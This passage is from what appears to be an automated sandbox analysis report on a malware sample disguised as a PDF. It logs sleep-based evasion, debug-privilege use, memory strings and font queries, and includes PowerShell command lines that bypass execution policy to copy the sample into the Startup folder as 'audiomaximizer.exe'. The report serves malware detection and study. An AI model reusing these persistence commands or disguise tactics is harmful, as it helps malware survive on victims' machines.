            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -596015s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -595906s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -595794s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -595687s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -595578s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -595468s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -595359s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -595250s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -595140s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -595031s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -594921s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -594812s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -594703s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -594593s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -594484s >= -30000s
            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 599874Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 599765Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 599546Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 599310Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 599200Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 599062Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 598953Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 598843Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 598734Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 598625Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 598515Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 598388Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 598280Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 598170Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 598062Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 597953Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 597843Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 597734Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 597625Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 597515Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 597406Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 597297Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 597187Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 597077Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 596968Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 596825Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 596717Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 596544Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 596424Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 596297Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 596187Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 596078Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 595968Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 595859Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 595750Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 595640Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 595531Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 595422Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 595312Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 595203Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 595093Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 594984Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 594875Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 594765Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 594656Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 594547Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 594437Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 594327Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 600000
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 599750
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 599640
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 599531
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 599422
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 599312
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 599202
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 599093
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 598984
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 598874
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 598765
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 598656
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 598544
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 598437
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 598328
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 598218
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 598109
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 598000
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 597890
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 597763
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 597655
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 597546
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 597437
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 597325
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 597218
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 597109
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 597000
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 596890
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 596781
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 596671
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 596562
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 596452
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 596343
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 596234
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 596125
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 596015
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 595906
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 595794
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 595687
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 595578
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 595468
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 595359
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 595250
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 595140
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 595031
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 594921
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 594812
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 594703
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 594593
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 594484
            Source: audiomaximizer.exe, 00000008.00000002.4135735189.00000000031BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8dd34928e143909LR^q\
            Source: svchost.exe, 00000004.00000002.3333450427.000002362DA2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3334978982.0000023633054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4127932595.0000000001607000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll`
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.000000000376C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8dd348fc5d06ecdLR^q
            Source: audiomaximizer.exe, 00000008.00000002.4127969690.0000000001356000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PDF-3093900299039 pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe'
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PDF-3093900299039 pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe'Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeProcess created: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe "C:\Users\user\Desktop\PDF-3093900299039 pdf.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe'Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -executionpolicy bypass -command copy-item 'c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\audiomaximizer.exe' 'c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\audiomaximizer.exe'
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -executionpolicy bypass -command copy-item 'c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\audiomaximizer.exe' 'c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\audiomaximizer.exe'Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
